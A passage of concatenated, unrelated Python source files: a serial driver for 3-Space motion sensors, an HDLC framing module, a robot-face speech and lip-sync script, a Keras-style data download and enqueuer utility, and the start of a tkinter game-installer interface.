if baudrate not in _allowed_baudrates:
baudrate = _baudrate
_print("Error baudrate value not allowed. Using default.")
serial_port = serial.Serial(port_name, baudrate=baudrate, timeout=0.5, writeTimeout=0.5)
if serial_port is not None:
new_inst = super(_TSSensor, cls).__new__(cls)
serial_port.write(bytearray((0xf7, 0x56, 0x56)))
time.sleep(0.01)
serial_port.flushInput()
return _generateSensorClass(new_inst, serial_port, TSEMSensor._device_types)
_print('Error serial port was not made')
## 231(0xe7)
def setUARTBaudRate(self, baud_rate, timestamp=False):
fail_byte, t_stamp, data = self.writeRead('_setUARTBaudRate', baud_rate)
if not fail_byte:
self.baudrate = baud_rate
if timestamp:
return (not fail_byte, t_stamp)
return not fail_byte
## generated functions EM_
## 29(0x1d)
def setPinMode(self, mode, pin, timestamp=False):
arg_list = (mode, pin)
fail_byte, t_stamp, data = self.writeRead('setPinMode', arg_list)
if timestamp:
return (not fail_byte, t_stamp)
return not fail_byte
## 30(0x1e)
def getPinMode(self, timestamp=False):
fail_byte, t_stamp, data = self.writeRead('getPinMode')
if timestamp:
return (data, t_stamp)
return data
## 31(0x1f)
def getInterruptStatus(self, timestamp=False):
fail_byte, t_stamp, data = self.writeRead('getInterruptStatus')
if timestamp:
return (data, t_stamp)
return data
## 232(0xe8)
def getUARTBaudRate(self, timestamp=False):
fail_byte, t_stamp, data = self.writeRead('getUARTBaudRate')
if timestamp:
return (data, t_stamp)
return data
## END generated functions EM_
class TSDLSensor(_TSSensor):
command_dict = _TSSensor.command_dict.copy()
command_dict.update({
'turnOnMassStorage': (0x39, 0, None, 0, None, 1),
'turnOffMassStorage': (0x3a, 0, None, 0, None, 1),
'formatAndInitializeSDCard': (0x3b, 0, None, 0, None, 1),
'beginDataLoggingSession': (0x3c, 0, None, 0, None, 1),
'endDataLoggingSession': (0x3d, 0, None, 0, None, 1),
'setClockValues': (0x3e, 0, None, 6, '>6B', 1),
'getClockValues': (0x3f, 6, '>6B', 0, None, 1),
'getBatteryVoltage': (0xc9, 4, '>f', 0, None, 1),
'getBatteryPercentRemaining': (0xca, 1, '>B', 0, None, 1),
'getBatteryStatus': (0xcb, 1, '>B', 0, None, 1),
'getButtonState': (0xfa, 1, '>B', 0, None, 1)
})
reverse_command_dict = dict(map(lambda x: [x[1][0], x[0]], command_dict.items()))
_device_types = ["DL", "DL-HH"]
def __new__(cls, com_port=None, baudrate=_baudrate, timestamp_mode=TSS_TIMESTAMP_SENSOR):
if com_port is None:
return None
if com_port:
if type(com_port) is str:
port_name = com_port
elif type(com_port) is ComInfo:
port_name = com_port.com_port
else:
_print("An erronous parameter was passed in")
return None
if baudrate not in _allowed_baudrates:
baudrate = _baudrate
_print("Error baudrate value not allowed. Using default.")
serial_port = serial.Serial(port_name, baudrate=baudrate, timeout=0.5, writeTimeout=0.5)
if serial_port is not None:
new_inst = super(_TSSensor, cls).__new__(cls)
serial_port.write(bytearray((0xf7, 0x56, 0x56)))
time.sleep(0.01)
serial_port.flushInput()
return _generateSensorClass(new_inst, serial_port, TSDLSensor._device_types)
_print('Error serial port was not made')
## generated functions DL_
## 57(0x39)
def turnOnMassStorage(self, timestamp=False):
fail_byte, t_stamp, data = self.writeRead('turnOnMassStorage')
if timestamp:
return (not fail_byte, t_stamp)
return not fail_byte
## 58(0x3a)
def turnOffMassStorage(self, timestamp=False):
fail_byte, t_stamp, data = self.writeRead('turnOffMassStorage')
if timestamp:
return (not fail_byte, t_stamp)
return not fail_byte
## 59(0x3b)
def formatAndInitializeSDCard(self, timestamp=False):
fail_byte, t_stamp, data = self.writeRead('formatAndInitializeSDCard')
if timestamp:
return (not fail_byte, t_stamp)
return not fail_byte
## 60(0x3c)
def beginDataLoggingSession(self, timestamp=False):
fail_byte, t_stamp, data = self.writeRead('beginDataLoggingSession')
if timestamp:
return (not fail_byte, t_stamp)
return not fail_byte
## 61(0x3d)
def endDataLoggingSession(self, timestamp=False):
fail_byte, t_stamp, data = self.writeRead('endDataLoggingSession')
if timestamp:
return (not fail_byte, t_stamp)
return not fail_byte
## 62(0x3e)
def setClockValues(self, month, day, year, hour, minute, second, timestamp=False):
arg_list = (month, day, year, hour, minute, second)
fail_byte, t_stamp, data = self.writeRead('setClockValues', arg_list)
if timestamp:
return (not fail_byte, t_stamp)
return not fail_byte
## 63(0x3f)
def getClockValues(self, timestamp=False):
fail_byte, t_stamp, data = self.writeRead('getClockValues')
if timestamp:
return (data, t_stamp)
return data
## 201(0xc9)
def getBatteryVoltage(self, timestamp=False):
fail_byte, t_stamp, data = self.writeRead('getBatteryVoltage')
if timestamp:
return (data, t_stamp)
return data
## 202(0xca)
def getBatteryPercentRemaining(self, timestamp=False):
fail_byte, t_stamp, data = self.writeRead('getBatteryPercentRemaining')
if timestamp:
return (data, t_stamp)
return data
## 203(0xcb)
def getBatteryStatus(self, timestamp=False):
fail_byte, t_stamp, data = self.writeRead('getBatteryStatus')
if timestamp:
return (data, t_stamp)
return data
## 250(0xfa)
def getButtonState(self, timestamp=False):
fail_byte, t_stamp, data = self.writeRead('getButtonState')
if timestamp:
return (data, t_stamp)
return data
## END generated functions DL_
class TSBTSensor(_TSSensor):
command_dict = _TSSensor.command_dict.copy()
command_dict.update({
'getBatteryVoltage': (0xc9, 4, '>f', 0, None, 1),
'getBatteryPercentRemaining': (0xca, 1, '>B', 0, None, 1),
'getBatteryStatus': (0xcb, 1, '>B', 0, None, 1),
'_setUARTBaudRate': (0xe7, 0, None, 4, '>I', 1),
'getUARTBaudRate': (0xe8, 4, '>I', 0, None, 1),
'getButtonState': (0xfa, 1, '>B', 0, None, 1)
})
reverse_command_dict = dict(map(lambda x: [x[1][0], x[0]], command_dict.items()))
_device_types = ["BT", "BT-HH"]
def __new__(cls, com_port=None, baudrate=_baudrate, timestamp_mode=TSS_TIMESTAMP_SENSOR):
if com_port is None:
return None
if com_port:
if type(com_port) is str:
port_name = com_port
elif type(com_port) is ComInfo:
port_name = com_port.com_port
else:
_print("An erronous parameter was passed in")
return None
if baudrate not in _allowed_baudrates:
baudrate = _baudrate
_print("Error baudrate value not allowed. Using default.")
serial_port = serial.Serial(port_name, baudrate=baudrate, timeout=2.5, writeTimeout=2.5)
if serial_port is not None:
new_inst = super(_TSSensor, cls).__new__(cls)
serial_port.write(bytearray((0xf7, 0x56, 0x56)))
time.sleep(0.25)
serial_port.flushInput()
return _generateSensorClass(new_inst, serial_port, TSBTSensor._device_types)
_print('Error serial port was not made')
## 231(0xe7)
def setUARTBaudRate(self, baud_rate, timestamp=False):
fail_byte, t_stamp, data = self.writeRead('_setUARTBaudRate', baud_rate)
if not fail_byte:
self.baudrate = baud_rate
if timestamp:
return (not fail_byte, t_stamp)
return not fail_byte
## generated functions BT_
## 201(0xc9)
def getBatteryVoltage(self, timestamp=False):
fail_byte, t_stamp, data = self.writeRead('getBatteryVoltage')
if timestamp:
return (data, t_stamp)
return data
## 202(0xca)
def getBatteryPercentRemaining(self, timestamp=False):
fail_byte, t_stamp, data = self.writeRead('getBatteryPercentRemaining')
if timestamp:
return (data, t_stamp)
return data
## 203(0xcb)
def getBatteryStatus(self, timestamp=False):
fail_byte, t_stamp, data = self.writeRead('getBatteryStatus')
if timestamp:
return (data, t_stamp)
return data
## 232(0xe8)
def getUARTBaudRate(self, timestamp=False):
fail_byte, t_stamp, data = self.writeRead('getUARTBaudRate')
if timestamp:
return (data, t_stamp)
return data
## 250(0xfa)
def getButtonState(self, timestamp=False):
fail_byte, t_stamp, data = self.writeRead('getButtonState')
if timestamp:
return (data, t_stamp)
return data
## END generated functions BT_
global_broadcaster= Broadcaster()
|
simple_hdlc.py
|
#!/usr/bin/python
# coding: utf8
__version__ = '0.3'
import logging
import struct
import time
import six
import binascii
from threading import Thread
from PyCRC.CRCCCITT import CRCCCITT
logger = logging.getLogger(__name__)
ESCAPE_CHAR = 0x7d
END_CHAR = 0x7e
ESCAPE_MASK = 0x20
MAX_FRAME_LENGTH = 1024
def bin_to_hex(b):
if six.PY2:
return b.encode("hex")
return b.hex()
def calcCRC(data):
crc = CRCCCITT("FFFF").calculate(six.binary_type(data))
b = bytearray(struct.pack(">H", crc))
return b
class Frame(object):
STATE_READ = 0x01
STATE_ESCAPE = 0x02
def __init__(self):
self.finished = False
self.error_message = None
self.error = False
self.state = self.STATE_READ
self.data = bytearray()
self.crc = bytearray()
self.reader = None
def __len__(self):
return len(self.data)
def reset(self):
self.data = bytearray()
self.finished = False
self.error = False
self.state = self.STATE_READ
def addByte(self, b):
if b == END_CHAR:
logger.debug("frame start")
if self.state == self.STATE_ESCAPE:
return self.abort("invalid framing (got end in escapemode)")
else:
# maybe finished
if len(self.data) >= 3:
return self.finish()
return False
if self.state == self.STATE_ESCAPE:
self.state = self.STATE_READ
b = b ^ 0x20
elif (b == ESCAPE_CHAR):
self.state = self.STATE_ESCAPE
return False
self.data.append(b)
if len(self.data) > MAX_FRAME_LENGTH:
return self.abort("frame to big")
return False
def finish(self):
res = self._checkCRC()
self.crc = self.data[-2:]
self.data = self.data[:-2]
if res:
self.error = False
self.finished = True
return True
return self.abort("Invalid Frame (CRC FAIL)")
def abort(self, message):
self.error = True
self.finished = True
self.error_message = message
return True
def _checkCRC(self):
data_without_crc = self.data[:-2]
crc = self.data[-2:]
res = bool(crc == calcCRC(data_without_crc))
if not res:
c1 = six.binary_type(crc)
c2 = six.binary_type(calcCRC(data_without_crc))
logger.warning("invalid crc %s != %s <- our calculation", bin_to_hex(c1), bin_to_hex(c2))
return res
def toString(self):
return six.binary_type(self.data)
class HDLC(object):
def __init__(self, serial, reset=True):
self.serial = serial
self.current_frame = None
self.last_frame = None
self.frame_callback = None
self.error_callback = None
self.running = False
logger.debug("HDLC INIT: %s bytes in buffer", self.serial.in_waiting)
if reset:
self.serial.reset_input_buffer()
@classmethod
def toBytes(cls, data):
return bytearray(data)
def sendFrame(self, data):
bs = self._encode(self.toBytes(data))
logger.info("Sending Frame: %s", bin_to_hex(bs))
res = self.serial.write(bs)
logger.info("Send %s bytes", res)
def _onFrame(self, frame):
self.last_frame = frame
s = self.last_frame.toString()
logger.info("Received Frame: %s", bin_to_hex(s))
if self.frame_callback is not None:
self.frame_callback(s)
def _onError(self, frame):
self.last_frame = frame
s = self.last_frame.toString()
logger.warning("Frame Error: %s", bin_to_hex(s))
if self.error_callback is not None:
self.error_callback(s)
def _readBytes(self, size):
cnt = 0
while cnt < size:
b = six.binary_type(self.serial.read(1))
if len(b) < 1:
return False
cnt += len(b)
res = self._readByte(six.byte2int(b))
if res:
return True
def _readByte(self, b):
assert 0 <= b <= 255
if not self.current_frame:
self.current_frame = Frame()
res = self.current_frame.addByte(b)
if res:
if self.current_frame.error:
self._onError(self.current_frame)
self.current_frame = None
else:
self._onFrame(self.current_frame)
self.current_frame = None
return res
def readFrame(self, timeout=5):
timer = time.time() + timeout
while time.time() < timer:
i = self.serial.in_waiting
if i < 1:
time.sleep(0.0001)
continue
res = self._readBytes(i)
if res:
if self.last_frame.finished:
if not self.last_frame.error:
# Success
s = self.last_frame.toString()
return s
# error
raise ValueError(self.last_frame.error_message)
raise RuntimeError("Unexpected Framing Error")
raise RuntimeError("readFrame timeout")
@classmethod
def _encode(cls, bs):
data = bytearray()
data.append(0x7E)
crc = calcCRC(bs)
bs = bs + crc
for byte in bs:
if byte == 0x7E or byte == 0x7D:
data.append(0x7D)
data.append(byte ^ 0x20)
else:
data.append(byte)
data.append(0x7E)
return bytes(data)
def _receiveLoop(self):
while self.running:
i = self.serial.in_waiting
if i < 1:
time.sleep(0.001)
continue
res = self._readBytes(i)
def startReader(self, onFrame, onError=None):
if self.running:
raise RuntimeError("reader already running")
self.reader = Thread(target=self._receiveLoop)
self.reader.setDaemon(True)
self.frame_callback = onFrame
self.error_callback = onError
self.running = True
self.reader.start()
def stopReader(self):
self.running = False
self.reader.join()
self.reader = None
|
threads5.py
|
import numpy as np
from threading import Thread, Event
import face
from time import sleep, time
import os
from scipy.io import wavfile
from scipy.ndimage.filters import maximum_filter1d,gaussian_filter
import matplotlib.pyplot as plt
from nltk.tokenize import sent_tokenize
import string
#download nltk punkt in order to complete nltk set-up
#nltk.download()
roboFace = face.Face(x_weight=0.8, y_weight=0.2)
def Undersampled_Lip_Tragectory(phrase,Sleep_Time):
A ="espeak -z -s 100 -v female5 -w test.wav "
A=A + "'" + phrase + "'"
os.system(A)
samplerate, data = wavfile.read('test.wav')
dt=1/float(samplerate)
times = np.arange(len(data))/float(samplerate)
N=len(times)
max_data=maximum_filter1d(data,size=1000)
max_data=gaussian_filter(max_data,sigma=100)
max_Amplitude=10
Amplitude=max_Amplitude*(max_data/float(np.max(max_data)))
n=Sleep_Time*samplerate
Amp=[]
T=[]
i=0
while (i*n<N):
Amp.append(Amplitude[int(i*n)])
T.append(times[int(i*n)])
i=i+1
Amp=np.array(Amp)
T=np.array(T)
'''
plt.figure(1)
plt.suptitle(phrase)
plt.subplot(211)
plt.plot(times,data)
plt.plot(times,max_data,'r')
plt.subplot(212)
plt.plot(times,Amplitude)
plt.plot(T,Amp,'r*')
plt.show()
'''
return Amp,T
def MoveLips(Sleep_Time, Amplitude, flag):
roboFace.setSpeedLips(127)
i=0
while flag.isSet() and i < len(Amplitude):
roboFace.moveLips(int(Amplitude[i]))
sleep(Sleep_Time)
i = i + 1
if ~flag.isSet():
roboFace.moveLips(0)
sleep(0.05)
def Talk(phrase, flag):
A = "espeak -z -s 100 -v female5 "
A = A + "'" + phrase + "'"
os.system(A)
flag.clear()
def Say(text):
phrases=sent_tokenize(text)
for phrase in phrases:
phrase=phrase.replace("'"," ")
flag = Event()
flag.set()
Sleep_Time=0.05
Amplitude,Time=Undersampled_Lip_Tragectory(phrase,Sleep_Time)
thread_movement = Thread(target=MoveLips, args=(Sleep_Time, Amplitude, flag))
thread_talk = Thread(target=Talk, args=(phrase, flag))
thread_talk.start()
thread_movement.start()
thread_talk.join()
thread_movement.join()
phrases = ['Hi! My name is Roboface! I am the best robot in the universe!',
'My purpose is to study Human Robot interaction',
'I can recognise human emotions and express my fillings though verbal and non verbal comunication',
'I can express emotions like happiness, anger and sadness',
'I can think with a neural network and speak with a real human voice, though a text to speach device',
'Some of my default phrases are',
'I like it when people smile at me!',
'You are a female, am I right?',
'You are a male, am I right?',
'You are wearing beautiful earrings today!',
'I see you are wearing lipstick today. Pretty!',
'Nice blond hair!',
'You are wearing eyeglasses!',
'You have nice brown hair!',
'You have nice black hair!',
'You must be a wise man, judging by your gray hair!',
'You have nice wavy hair!',
"I'm sorry Dave. I'm afraid I cant do that.",
"Hey, why is no one looking at me? I feel neglected. I feel it. I feel it! I am afraid!",
"Hey! I am a great actor! I think that I should be the next StarWars maskot. Why George Lukas hasnt made me a contract yet?",
"May the force be with you! Good bye!"
]
for phr in phrases:
print(phr)
Say(phr)
|
data_utils.py
|
"""Utilities for file download and caching."""
from __future__ import absolute_import
from __future__ import print_function
import hashlib
import multiprocessing
import multiprocessing.managers
import os
import random
import shutil
import sys
import tarfile
import threading
import time
import zipfile
from abc import abstractmethod
from multiprocessing.pool import ThreadPool
import numpy as np
import six
from six.moves.urllib.error import HTTPError
from six.moves.urllib.error import URLError
from six.moves.urllib.request import urlopen
try:
import queue
except ImportError:
import Queue as queue
from ..utils.generic_utils import Progbar
if sys.version_info[0] == 2:
def urlretrieve(url, filename, reporthook=None, data=None):
"""Replacement for `urlretrive` for Python 2.
Under Python 2, `urlretrieve` relies on `FancyURLopener` from legacy
`urllib` module, known to have issues with proxy management.
# Arguments
url: url to retrieve.
filename: where to store the retrieved data locally.
reporthook: a hook function that will be called once
on establishment of the network connection and once
after each block read thereafter.
The hook will be passed three arguments;
a count of blocks transferred so far,
a block size in bytes, and the total size of the file.
data: `data` argument passed to `urlopen`.
"""
def chunk_read(response, chunk_size=8192, reporthook=None):
content_type = response.info().get('Content-Length')
total_size = -1
if content_type is not None:
total_size = int(content_type.strip())
count = 0
while 1:
chunk = response.read(chunk_size)
count += 1
if not chunk:
reporthook(count, total_size, total_size)
break
if reporthook:
reporthook(count, chunk_size, total_size)
yield chunk
response = urlopen(url, data)
with open(filename, 'wb') as fd:
for chunk in chunk_read(response, reporthook=reporthook):
fd.write(chunk)
else:
from six.moves.urllib.request import urlretrieve
def _extract_archive(file_path, path='.', archive_format='auto'):
"""Extracts an archive if it matches tar, tar.gz, tar.bz, or zip formats.
# Arguments
file_path: path to the archive file
path: path to extract the archive file
archive_format: Archive format to try for extracting the file.
Options are 'auto', 'tar', 'zip', and None.
'tar' includes tar, tar.gz, and tar.bz files.
The default 'auto' is ['tar', 'zip'].
None or an empty list will return no matches found.
# Returns
True if a match was found and an archive extraction was completed,
False otherwise.
"""
if archive_format is None:
return False
if archive_format is 'auto':
archive_format = ['tar', 'zip']
if isinstance(archive_format, six.string_types):
archive_format = [archive_format]
for archive_type in archive_format:
if archive_type is 'tar':
open_fn = tarfile.open
is_match_fn = tarfile.is_tarfile
if archive_type is 'zip':
open_fn = zipfile.ZipFile
is_match_fn = zipfile.is_zipfile
if is_match_fn(file_path):
with open_fn(file_path) as archive:
try:
archive.extractall(path)
except (tarfile.TarError, RuntimeError,
KeyboardInterrupt):
if os.path.exists(path):
if os.path.isfile(path):
os.remove(path)
else:
shutil.rmtree(path)
raise
return True
return False
def get_file(fname,
origin,
untar=False,
md5_hash=None,
file_hash=None,
cache_subdir='datasets',
hash_algorithm='auto',
extract=False,
archive_format='auto',
cache_dir=None):
"""Downloads a file from a URL if it not already in the cache.
By default the file at the url `origin` is downloaded to the
cache_dir `~/.keras`, placed in the cache_subdir `datasets`,
and given the filename `fname`. The final location of a file
`example.txt` would therefore be `~/.keras/datasets/example.txt`.
Files in tar, tar.gz, tar.bz, and zip formats can also be extracted.
Passing a hash will verify the file after download. The command line
programs `shasum` and `sha256sum` can compute the hash.
# Arguments
fname: Name of the file. If an absolute path `/path/to/file.txt` is
specified the file will be saved at that location.
origin: Original URL of the file.
untar: Deprecated in favor of 'extract'.
boolean, whether the file should be decompressed
md5_hash: Deprecated in favor of 'file_hash'.
md5 hash of the file for verification
file_hash: The expected hash string of the file after download.
The sha256 and md5 hash algorithms are both supported.
cache_subdir: Subdirectory under the Keras cache dir where the file is
saved. If an absolute path `/path/to/folder` is
specified the file will be saved at that location.
hash_algorithm: Select the hash algorithm to verify the file.
options are 'md5', 'sha256', and 'auto'.
The default 'auto' detects the hash algorithm in use.
extract: True tries extracting the file as an Archive, like tar or zip.
archive_format: Archive format to try for extracting the file.
Options are 'auto', 'tar', 'zip', and None.
'tar' includes tar, tar.gz, and tar.bz files.
The default 'auto' is ['tar', 'zip'].
None or an empty list will return no matches found.
cache_dir: Location to store cached files, when None it
defaults to the [Keras Directory](/faq/#where-is-the-keras-configuration-filed-stored).
# Returns
Path to the downloaded file
"""
if cache_dir is None:
cache_dir = os.path.expanduser(os.path.join('~', '.keras'))
if md5_hash is not None and file_hash is None:
file_hash = md5_hash
hash_algorithm = 'md5'
datadir_base = os.path.expanduser(cache_dir)
if not os.access(datadir_base, os.W_OK):
datadir_base = os.path.join('/tmp', '.keras')
datadir = os.path.join(datadir_base, cache_subdir)
if not os.path.exists(datadir):
os.makedirs(datadir)
if untar:
untar_fpath = os.path.join(datadir, fname)
fpath = untar_fpath + '.tar.gz'
else:
fpath = os.path.join(datadir, fname)
download = False
if os.path.exists(fpath):
# File found; verify integrity if a hash was provided.
if file_hash is not None:
if not validate_file(fpath, file_hash, algorithm=hash_algorithm):
print('A local file was found, but it seems to be '
'incomplete or outdated because the ' + hash_algorithm +
' file hash does not match the original value of ' +
file_hash + ' so we will re-download the data.')
download = True
else:
download = True
if download:
print('Downloading data from', origin)
class ProgressTracker(object):
# Maintain progbar for the lifetime of download.
# This design was chosen for Python 2.7 compatibility.
progbar = None
def dl_progress(count, block_size, total_size):
if ProgressTracker.progbar is None:
if total_size is -1:
total_size = None
ProgressTracker.progbar = Progbar(total_size)
else:
ProgressTracker.progbar.update(count * block_size)
error_msg = 'URL fetch failure on {}: {} -- {}'
try:
try:
urlretrieve(origin, fpath, dl_progress)
except URLError as e:
raise Exception(error_msg.format(origin, e.errno, e.reason))
except HTTPError as e:
raise Exception(error_msg.format(origin, e.code, e.msg))
except (Exception, KeyboardInterrupt) as e:
if os.path.exists(fpath):
os.remove(fpath)
raise
ProgressTracker.progbar = None
if untar:
if not os.path.exists(untar_fpath):
_extract_archive(fpath, datadir, archive_format='tar')
return untar_fpath
if extract:
_extract_archive(fpath, datadir, archive_format)
return fpath
def _hash_file(fpath, algorithm='sha256', chunk_size=65535):
"""Calculates a file sha256 or md5 hash.
# Example
```python
>>> from keras.data_utils import _hash_file
>>> _hash_file('/path/to/file.zip')
'e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855'
```
# Arguments
fpath: path to the file being validated
algorithm: hash algorithm, one of 'auto', 'sha256', or 'md5'.
The default 'auto' detects the hash algorithm in use.
chunk_size: Bytes to read at a time, important for large files.
# Returns
The file hash
"""
if (algorithm is 'sha256') or (algorithm is 'auto' and len(hash) is 64):
hasher = hashlib.sha256()
else:
hasher = hashlib.md5()
with open(fpath, 'rb') as fpath_file:
for chunk in iter(lambda: fpath_file.read(chunk_size), b''):
hasher.update(chunk)
return hasher.hexdigest()
def validate_file(fpath, file_hash, algorithm='auto', chunk_size=65535):
"""Validates a file against a sha256 or md5 hash.
# Arguments
fpath: path to the file being validated
file_hash: The expected hash string of the file.
The sha256 and md5 hash algorithms are both supported.
algorithm: Hash algorithm, one of 'auto', 'sha256', or 'md5'.
The default 'auto' detects the hash algorithm in use.
chunk_size: Bytes to read at a time, important for large files.
# Returns
Whether the file is valid
"""
if ((algorithm is 'sha256') or
(algorithm is 'auto' and len(file_hash) is 64)):
hasher = 'sha256'
else:
hasher = 'md5'
if str(_hash_file(fpath, hasher, chunk_size)) == str(file_hash):
return True
else:
return False
class Sequence(object):
"""Base object for fitting to a sequence of data, such as a dataset.
Every `Sequence` must implements the `__getitem__` and the `__len__` methods.
# Examples
```python
from skimage.io import imread
from skimage.transform import resize
import numpy as np
# Here, `x_set` is list of path to the images
# and `y_set` are the associated classes.
class CIFAR10Sequence(Sequence):
def __init__(self, x_set, y_set, batch_size):
self.X,self.y = x_set,y_set
self.batch_size = batch_size
def __len__(self):
return len(self.X) // self.batch_size
def __getitem__(self,idx):
batch_x = self.X[idx*self.batch_size:(idx+1)*self.batch_size]
batch_y = self.y[idx*self.batch_size:(idx+1)*self.batch_size]
return np.array([
resize(imread(file_name), (200,200))
for file_name in batch_x]), np.array(batch_y)
```
"""
@abstractmethod
def __getitem__(self, index):
"""Gets batch at position `index`.
# Arguments
index: position of the batch in the Sequence.
# Returns
A batch
"""
raise NotImplementedError
@abstractmethod
def __len__(self):
"""Number of batch in the Sequence.
# Returns
The number of batches in the Sequence.
"""
raise NotImplementedError
class HolderManager(multiprocessing.managers.BaseManager):
"""Custom manager to share a Holder object."""
pass
class Holder(object):
"""Object to encapsulate a Sequence.
This allows the Sequence to be shared across multiple workers.
# Arguments
seq: Sequence object to be shared.
"""
def __init__(self, seq):
self.seq = seq
def __getitem__(self, idx):
return self.seq[idx]
def __len__(self):
return len(self.seq)
# Register the Holder class using the ListProxy (allows __len__ and __getitem__)
HolderManager.register('Holder', Holder, multiprocessing.managers.ListProxy)
def get_index(ds, i):
"""Quick fix for Python2, otherwise, it cannot be pickled.
# Arguments
ds: a Holder or Sequence object
i: index
# Returns
The value at index `i`.
"""
return ds[i]
class SequenceEnqueuer(object):
"""Base class to enqueue inputs.
The task of an Enqueuer is to use parallelism to speed up preprocessing.
This is done with processes or threads.
# Examples
```python
enqueuer = SequenceEnqueuer(...)
enqueuer.start()
datas = enqueuer.get()
for data in datas:
# Use the inputs; training, evaluating, predicting.
# ... stop sometime.
enqueuer.close()
```
The `enqueuer.get()` should be an infinite stream of datas.
"""
@abstractmethod
def is_running(self):
raise NotImplementedError
@abstractmethod
def start(self, workers=1, max_queue_size=10):
"""Starts the handler's workers.
# Arguments
workers: number of worker threads
max_queue_size: queue size
(when full, threads could block on `put()`).
"""
raise NotImplementedError
@abstractmethod
def stop(self, timeout=None):
"""Stop running threads and wait for them to exit, if necessary.
Should be called by the same thread which called start().
# Arguments
timeout: maximum time to wait on thread.join()
"""
raise NotImplementedError
@abstractmethod
def get(self):
"""Creates a generator to extract data from the queue.
Skip the data if it is `None`.
# Returns
Generator yielding tuples `(inputs, targets)`
or `(inputs, targets, sample_weights)`.
"""
raise NotImplementedError
class OrderedEnqueuer(SequenceEnqueuer):
"""Builds a Enqueuer from a Sequence.
Used in `fit_generator`, `evaluate_generator`, `predict_generator`.
# Arguments
sequence: A `keras.utils.data_utils.Sequence` object.
use_multiprocessing: use multiprocessing if True, otherwise threading
scheduling: Sequential querying of datas if 'sequential', random otherwise.
"""
def __init__(self, sequence,
use_multiprocessing=False,
scheduling='sequential'):
self.manager = HolderManager()
self.manager.start()
self.sequence = self.manager.Holder(sequence)
self.use_multiprocessing = use_multiprocessing
self.scheduling = scheduling
self.workers = 0
self.executor = None
self.queue = None
self.run_thread = None
self.stop_signal = None
def is_running(self):
return self.stop_signal is not None and not self.stop_signal.is_set()
def start(self, workers=1, max_queue_size=10):
"""Start the handler's workers.
# Arguments
workers: number of worker threads
max_queue_size: queue size
(when full, workers could block on `put()`)
"""
if self.use_multiprocessing:
self.executor = multiprocessing.Pool(workers)
else:
self.executor = ThreadPool(workers)
self.queue = queue.Queue(max_queue_size)
self.stop_signal = threading.Event()
self.run_thread = threading.Thread(target=self._run)
self.run_thread.daemon = True
self.run_thread.start()
def _run(self):
"""Function to submit request to the executor and queue the `Future` objects."""
sequence = list(range(len(self.sequence)))
while True:
if self.scheduling is not 'sequential':
random.shuffle(sequence)
for i in sequence:
if self.stop_signal.is_set():
return
self.queue.put(
self.executor.apply_async(get_index,
(self.sequence, i)), block=True)
def get(self):
"""Creates a generator to extract data from the queue.
Skip the data if it is `None`.
# Returns
Generator yielding tuples (inputs, targets)
or (inputs, targets, sample_weights)
"""
try:
while self.is_running():
inputs = self.queue.get(block=True).get()
if inputs is not None:
yield inputs
except Exception as e:
self.stop()
raise StopIteration(e)
def stop(self, timeout=None):
"""Stops running threads and wait for them to exit, if necessary.
Should be called by the same thread which called `start()`.
# Arguments
timeout: maximum time to wait on `thread.join()`
"""
self.stop_signal.set()
with self.queue.mutex:
self.queue.queue.clear()
self.queue.unfinished_tasks = 0
self.queue.not_full.notify()
self.executor.close()
self.executor.join()
self.run_thread.join(timeout)
self.manager.shutdown()
class GeneratorEnqueuer(SequenceEnqueuer):
"""Builds a queue out of a data generator.
Used in `fit_generator`, `evaluate_generator`, `predict_generator`.
# Arguments
generator: a generator function which endlessly yields data
use_multiprocessing: use multiprocessing if True, otherwise threading
wait_time: time to sleep in-between calls to `put()`
random_seed: Initial seed for workers,
will be incremented by one for each workers.
"""
def __init__(self, generator,
use_multiprocessing=False,
wait_time=0.05,
random_seed=None):
self.wait_time = wait_time
self._generator = generator
self._use_multiprocessing = use_multiprocessing
self._threads = []
self._stop_event = None
self.queue = None
self.random_seed = random_seed
def start(self, workers=1, max_queue_size=10):
"""Kicks off threads which add data from the generator into the queue.
# Arguments
workers: number of worker threads
max_queue_size: queue size
(when full, threads could block on `put()`)
"""
def data_generator_task():
while not self._stop_event.is_set():
try:
if self._use_multiprocessing or self.queue.qsize() < max_queue_size:
generator_output = next(self._generator)
self.queue.put(generator_output)
else:
time.sleep(self.wait_time)
except Exception:
self._stop_event.set()
raise
try:
if self._use_multiprocessing:
self.queue = multiprocessing.Queue(maxsize=max_queue_size)
self._stop_event = multiprocessing.Event()
else:
self.queue = queue.Queue()
self._stop_event = threading.Event()
for _ in range(workers):
if self._use_multiprocessing:
# Reset random seed else all children processes
# share the same seed
np.random.seed(self.random_seed)
thread = multiprocessing.Process(target=data_generator_task)
thread.daemon = True
if self.random_seed is not None:
self.random_seed += 1
else:
thread = threading.Thread(target=data_generator_task)
self._threads.append(thread)
thread.start()
except:
self.stop()
raise
def is_running(self):
return self._stop_event is not None and not self._stop_event.is_set()
def stop(self, timeout=None):
"""Stops running threads and wait for them to exit, if necessary.
Should be called by the same thread which called `start()`.
# Arguments
timeout: maximum time to wait on `thread.join()`.
"""
if self.is_running():
self._stop_event.set()
for thread in self._threads:
if thread.is_alive():
if self._use_multiprocessing:
thread.terminate()
else:
thread.join(timeout)
if self._use_multiprocessing:
if self.queue is not None:
self.queue.close()
self._threads = []
self._stop_event = None
self.queue = None
def get(self):
"""Creates a generator to extract data from the queue.
Skip the data if it is `None`.
# Returns
A generator
"""
while self.is_running():
if not self.queue.empty():
inputs = self.queue.get()
if inputs is not None:
yield inputs
else:
time.sleep(self.wait_time)
|
logic.py
|
import sspm
import sys
import os
import subprocess
import tkinter as tk
from functools import partial
from threading import Thread
def toggleControlsBasedOnState(model, controls, commands):
currentState = model.currentState.get()
if currentState == "installing":
controls.chkShowMoreOptions.pack_forget()
controls.pgrProgress.pack(fill=tk.X, expand=True)
controls.txtOutput.pack(fill=tk.BOTH, expand=True)
controls.btnInstall.configure(text="Cancel",
command=commands.cancelInstall)
elif currentState == "readyToInstall":
controls.btnInstall.configure(text="Install",
state=tk.NORMAL,
command=commands.installGame)
model.showMore.set(False)
controls.pgrProgress.pack_forget()
controls.txtOutput.pack_forget()
controls.chkShowMoreOptions.pack(fill=tk.BOTH, expand=True)
elif currentState == "readyToRun":
controls.btnInstall.configure(text="Launch",
command=commands.runGame)
controls.pgrProgress.pack_forget()
controls.txtOutput.pack_forget()
controls.chkShowMoreOptions.pack_forget()
controls.pnlSettings.pack(fill=tk.BOTH, expand=True)
def toggleMoreVisibility(model, controls, commands):
if model.showMore.get() is False:
controls.fraMore.pack_forget()
else:
